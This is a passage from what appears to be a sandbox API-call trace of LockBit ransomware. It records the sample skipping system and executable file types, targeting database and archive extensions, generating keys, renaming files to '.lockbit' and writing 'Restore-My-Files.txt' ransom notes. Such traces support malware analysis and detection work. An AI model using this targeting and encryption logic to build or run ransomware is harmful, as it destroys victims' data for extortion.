(lpString1="thumbs.db", lpString2="BD21377_.GIF") returned 1 [0204.562] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21377_.GIF") returned 1 [0204.562] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.562] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF") returned=".GIF" [0204.562] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.563] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.563] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.563] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF.lockbit") returned 78 [0204.564] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21377_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.569] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.570] malloc (_Size=0x40068) returned 0x3df0008 [0204.570] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=175) returned 1 [0204.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.571] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.576] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.576] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.577] free (_Block=0x1fa2ed8) [0204.577] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.577] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.577] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.577] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb28faf00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce611c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb28faf00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21398_.GIF", cAlternateFileName="")) returned 1 [0204.577] lstrcmpiW (lpString1=".", lpString2="BD21398_.GIF") returned -1 [0204.577] lstrcmpiW (lpString1="..", lpString2="BD21398_.GIF") returned -1 [0204.577] PathFindExtensionW (pszPath="BD21398_.GIF") returned=".GIF" [0204.577] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.577] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.577] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.577] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.577] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.577] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.577] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.577] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.577] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.578] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.578] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.578] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.578] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.578] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.578] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.578] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.579] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.579] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.579] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.579] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21398_.GIF") returned 1 [0204.579] lstrcmpiW (lpString1="ntldr", lpString2="BD21398_.GIF") returned 1 [0204.579] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21398_.GIF") returned 1 [0204.579] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21398_.GIF") returned 1 [0204.579] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21398_.GIF") returned -1 [0204.579] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21398_.GIF") returned 1 [0204.579] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21398_.GIF") returned 1 [0204.579] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.579] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF") returned=".GIF" [0204.579] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.579] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.579] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.579] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.580] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.580] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF.lockbit") returned 78 [0204.580] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21398_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.582] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.582] malloc (_Size=0x40068) returned 0x3df0008 [0204.582] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=326) returned 1 [0204.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.583] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.583] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.587] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.588] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.588] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.588] free (_Block=0x1fa2ed8) [0204.588] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.588] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.588] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.588] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c0dc00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce611c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb3c0dc00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x102, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21399_.GIF", cAlternateFileName="")) returned 1 [0204.588] lstrcmpiW (lpString1=".", lpString2="BD21399_.GIF") returned -1 [0204.588] lstrcmpiW (lpString1="..", lpString2="BD21399_.GIF") returned -1 [0204.588] PathFindExtensionW (pszPath="BD21399_.GIF") returned=".GIF" [0204.588] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.588] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.588] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.588] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.588] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.588] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.588] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.588] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.588] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.588] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.588] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.588] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.589] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.589] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.589] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.589] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.589] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.589] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.589] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.589] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21399_.GIF") returned 1 [0204.590] lstrcmpiW (lpString1="ntldr", lpString2="BD21399_.GIF") returned 1 [0204.590] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21399_.GIF") returned 1 [0204.590] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21399_.GIF") returned 1 [0204.590] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21399_.GIF") returned -1 [0204.590] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21399_.GIF") returned 1 [0204.590] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21399_.GIF") returned 1 [0204.590] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.590] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF") returned=".GIF" [0204.590] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.590] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.590] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.591] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.591] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.591] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.591] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.591] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.591] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF.lockbit") returned 78 [0204.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21399_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.593] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.593] malloc (_Size=0x40068) returned 0x3df0008 [0204.593] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=258) returned 1 [0204.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.594] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.594] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.599] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.599] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.599] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.599] free (_Block=0x1fa2ed8) [0204.599] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.599] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.599] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.599] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c0dc00, ftCreationTime.dwHighDateTime=0x1bd8f92, 